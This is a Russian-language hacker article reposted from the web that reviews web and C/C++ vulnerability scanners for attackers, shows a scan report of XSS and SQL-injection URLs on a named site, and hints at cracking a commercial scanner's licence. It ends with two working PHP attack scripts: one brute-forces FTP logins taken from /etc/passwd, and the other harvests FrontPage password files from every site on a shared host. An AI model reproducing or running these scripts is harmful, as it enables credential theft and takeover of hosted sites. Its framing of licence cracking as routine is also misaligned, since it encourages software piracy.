Ты наверное до сих пор думаешь, что хакеры ищут уязвимости в программных продуктах в ручную, постоянно смотря в исходный код или ручками вставляя спецсимволы в переменные скриптов? Ты глубокo ошибаешься, мой дорогой друг. Существует масса пауков сканеров и вспомогательных программ, которые позволяют по максимуму сократить время исследования. Конечно многие из них стоят кучу денег. поэтому достать их проблематично. хотя вполне реально. (Xspider, Nessus)другие же не обладают нужной функциональностью. Но всегда есть золотая середина. Сейчас я поведаю о очень полезных бесплатных программках которые оказуют отличную помощь взломщику, а также затронем тему локального поиска уязвимостей в исходниках вебскриптов.

[RPVS - во Франции также есть хакеры]

Платформа: Windows

Ссылка: http://81.57.125.106/~slythers/rpvsinstall.exe

Скромную заметку о этой программе я на днях отыскал на одном элитном международном хакерском форуме. Программа однозначно из класса Must Have. Тем более что софтина имеет как консольный, так и графический интерфейс. Полное ее название - Remote PHP Vulnerability Scanner. Именно, этот сканер затачивался под удаленное исследование сайтов написанных на пхп. Программа способна находить такие уязвимости: XSS, SQL-Injection, уязвимости подключения файлов функций include() и fopen() и раскрытия инсталляционного пути. Программа работает как с GET так и POST запросами. Имеет несколько режимов работы и отличную скорость сканирования. Принцип ее работы состоит в полном собрании линков с сайта, после чего подставляют спецсимволы в переменные и проводится анализ на показанных PHP ошибок и сигнатур которые подставлялись в переменные. Протестировав ее на одном из небольших сайтов, я получил подробный отчет о найденных уязвимостях.

Rapport on http://test3.ru/

Number of made request: 24

vuln include: 0

vuln xss: 12

err fopen: 0

err inc: 0

err sql: 0

----------------------------------------------------

Vuln XSS :

/?year=2006&month=02&day=6941337%22%27

/?year=6941337%22%27&month=01

/?year=6941337%22%27&month=02&day=05

/?year=2006&month=6941337%22%27&day=05

/?year=6941337%22%27&month=03

/?year=6941337%22%27&month=02

/?year=6941337%22%27&month=12

Vuln SQL :

/?id=6941337%22%27

/?id=15&c=6941337%22%27

-

Видишь, неплохой отчет. Автоматизация - отличный процесс, который неплохо экономит время и нервы. Да, кстати, в сети есть вполне компилируемые исходники этой чудо программы - http://81.57.125.106/~slythers/rpvsv1.3-src.rar.

В некоторых случаях когда масштабное сканирование не удается произвести то также работу можно полуавтомазировать с помощью такого софта как Mini-Browser (http://www.aignes.com) и Advanced HTTP Header Constructor 1.2 (http://www.ru24-team.net). Программы умеют многое и в любом случае тебе понадобятся, Mini-Browser позволяет подделывать POST/GET запросы и кукисы, а также вытаскивать все ссылки на странице. В программу встроен браузер (на движке ие) что делает работу еще удобнее. Ну а эстеты могут посмотреть на других вкладках исходник или лог Клиен-Сервер. Advanced HTTP Header Constructor работает с HTTP-заголовками, позволяет составлять/подделывать/отсылать POST и GET заголовки, а также многое другое. Для установки нужен свежий Framework.

[Acunetix Web Vulnerability Scanner 3 - Достойная замена XSpider]

Платформа: Windows

Ссылка: http://www.acunetix.com/vulnerability-s … anner3.exe

Когда-то просматривая каталог линков с astalavista.box.sk, я и наткнулся на эту программу. Ее описание мне придалось по вкусу. По своим возможностям она даже превосходит XSpider (http://www.ptsecurity.ru). Acunetix Web Vulnerability Scanner - cканер уязвимостей вэб-сайтов, сканирует как комплексно так и профильно, то есть Cross site scripting, SQL injection, cgi-test, CRLF Injection, Directory traversal, Authentication hacking. Также в сканере присутствует очень интересный тип атаки, как Google hacking на определенный сайт. Этот тип атаки использует поисковые системы для поиска уязвимостей, что очень полезно и оригинально. Сканер, также, отлично определяет версии веб сервера и его модулей. Плюс в него встроены различные перекодировщики и зашифровщики, HTTP снифер и средства подмена заголовков. Этот софт обязательно должен поселится в джентльменском наборе хакера. Так что не поленись, скачай и зацени! Плохо лишь одно, как и все программные продукты подобного рода, этот софт стоит больших денег (1500$). Но все лечится, защита там слабенькая. Тем более обновление доступно и в trial версии. Кто ищет, тот всегда найдет. Вот, я нашел

[Google – Величайший сканер уязвимостей]

С помощью поисковых систем, на самом деле, очень удобно искать нужные уязвимые скрипты. Нужно только вспомнить о єпидемии червячка Santy, который искал в Google все бажные phpBB форумы. Подробнее о червячке можно почитать здесь - http://www.f-secure.com/v-descs/santy_a.shtml. Также примеры реализации подобных сканеров ты найдещь на сайте команды AntiSecurity (http://antisec.2x4.ru). Так что, при грамотном написании программы и хорошей уязвимости, хакер получает контроль над огромным количеством сайтов.

Теперь мне бы хотелось затронуть тему переполнения буфера. Искать уязвимости такого типа вручную можно несколько лет, так что будем автоматизировать Кстатиб компания eyee.com утверждает, что большинство уязвимостей они нашли автоматически, используя специальное программное обеспечение.

[RATS - Грубый Инструмент Ревизии для Защиты]

Платформа: Windows

Ссылка: http://www.securesoftware.com/rats/

RATS, Rough Auditing Tool for Security (Грубый Инструмент Ревизии для Защиты) является утилитой ревизии защиты для C и C ++ кода. RATS просматривает исходный текст, находя потенциально опасные обращения к функциям. Цель этого инструмента - не окончательно найти ошибки, а скорее, обеспечить разумную отправную точку для выполнения ручной ревизий защиты. Мой хороший знакомый уже давно пользуется данной программой и очень доволен ее результатами. И еще конечно же радует открытость ее исходного кода.

Также следует обратить внимание на аналогичный софт под названием ITS4 (http://www.securitylab.ru/_tools/its4-1.1.1.tgz). Этот инструмент командной строки ищет уязвимости C и C ++ кода и работает на платформах Windows и Unix. Есть еще одна полезная программа из данного класса - Flawfinder (http://www.dwheeler.com/flawfinder/). В отличие от ITS4, flawfinder имеет полностью открытое программное обеспечение (распространяется согласно лицензии GPL).

[BofCheck - Buffer Overflow, Environment Variables Overflow/Format String Vulnerabilities Binary Tester]

Платформа: FreeBSD

Ссылка: http://oc192.1afm.com/

BofCheck используется для проверки программ на наличие основных уязвимостей. Программа проверяет переполнение буфера и уязвимости в параметрах командной строки. Софтину стоит использовать только когда нет под рукой исходного кода или поиск в нем не дал результатов.

[Qaudit - Perl приходит на помощь]

Оказывается классные вещи можно написать на интерпретируемом языке Perl. Qaudit.pl - сценарий для быстрой ревизии C и C ++ исходных файлов на наличие переполнения буфера, ошибок форматной строки, запросов исполняемых вызовов, переменных среды, и разных функций, которые часто имеют проблемы защиты. Лично я не ожидал от скрипта таких возможностей Кстати, на Perl написано множество полезных программ, таких как cgi-сканеры, эксплоиты, и даже IDS системы! Скачивай скриптик от сюда - http://www.SecurityLab.ru/_exploits/other/qaudit.txt.

Теперь я расскажу о полезном софте и сценариях, которые помогают поднять привилегии в системе и найти необходимую инфу.

[/etc/passwd - 2 минуты и FTP шелл к хостингу]

Данный скрипт производит простой брутфорс выдирая логины из /etc/passwd. Пароль при брутфорсе предполагается должен совпадать с логином. Чем больше юзеров в /etc/passwd, тем больше вероятность удачной работы эксплоита. Метод достаточно эффективен на больших хостингах.

$filename="/etc/passwd";

$ftp_server="localhost";

echo "FTP-server: $ftp_server

";

$fp = fopen ($filename, "r");

if ($fp)

{

while (!feof ($fp)) {

$buf = fgets($fp, 100);

ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);

$ftp_user_name=$g[1];

$ftp_user_pass=$g[1];

$conn_id=ftp_connect($ftp_server);

$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);

if (($conn_id) && ($login_result)) {

echo "Подключение loginassword - ".$ftp_user_name.":".$ftp_user_name."
";

ftp_close($conn_id);}

else {

echo $ftp_user_name." - error
";

}

}}

?>

[FrontPage Exploit - пароли заказывали сер?]

Эксплойт для FrontPage. Собирает читатебальные файлы с паролями по всему серверу. Позволяет создать нехилую базу всех сайтов в виде логин:пароль от хостера. Т.е пароли к FrontPage подходят к FTP и другим сервисам сервера. Рассшифровка производится с помощью John The Ripper (Standart/DES). Очень многие хостинги покоряются этому эксплоиту, а если его немного доработать то вообще получится чудо тузла

$p=getenv("DOCUMENT_ROOT");

if(exec("cat /etc/passwd")){

$ex=explode("/", $p);

$do_login=substr($p,0,strpos($p,$ex[2]));

$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));

exec("cat /etc/passwd", $passwd);

for($i=0; $i<=count($passwd); $i++) {

$xz=explode(":", $passwd[$i]);

$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";

if(exec("cat ".$file)){

exec("cat ".$file,$open);

$a=$open[count($open)-1];

$fr=strpos($a, ":");

$open1=substr($a, $fr);

if($xz[4]=='') {

$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";

Unset($domain);

exec("cat ".$file1,$domain);

$domain1=explode(" ",$domain[8]);

$xz[4]=$domain1[1];

}

echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."
";

} }

}

elseif(is_file("/etc/passwd")){

$ex=explode("/", $p);

$passwd="/etc/passwd";

echo "Путь: ".$p."
";

$do_login=substr($p,0,strpos($p,$ex[2]));

$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));

if(is_file($passwd)) {

$open=fopen($passwd,"r");

while (!feof($open)) {

$str=fgets($open, 100);

$mas=explode(":", $str);

$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";

if(is_file($file)) {

echo $mas[0];

$open1=fopen($file, "r");

$str1=fread($open1,filesize($file));

fclose($open1);

$fr=strpos($str1, ":");

$str2=substr($str1, $fr);

$str2=rtrim($str2);

//

if($mas[4]=='') {

$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";

$open2=fopen($file1,"r");

$domain=fread($open2,filesize($file1));

fclose($open2);

$domain1=substr($domain,106,110);

$domain2=explode("AuthUserFile",$domain1);

$mas[4]=$domain2[0];

}

//

echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."
";

}

}

fclose($open);

}

}

else{

echo "С пассам облом ((";

}

?>

[Между прочим]

Это что касается глобальной автоматизации. то. В принципе, автоматизировать можно все. Но нужно ли это? Не всегда автоматизация помогает, так что должен решать каждый раз как действовать. В статье я специально не рассмотрел популярный софт, как XSpider, Hydra и им подобные, о них многие знают, да и писать бы пришлось целую книгу. Более подробно о способах внутреннего обследования системы можешь почитать в моей статье "Демократичный хостинг".

Статья была надыбана мной где то в нэте

Автор: DreAmeRz
Web: http://www.Ru24-Team.net
[Ru24 Security Team]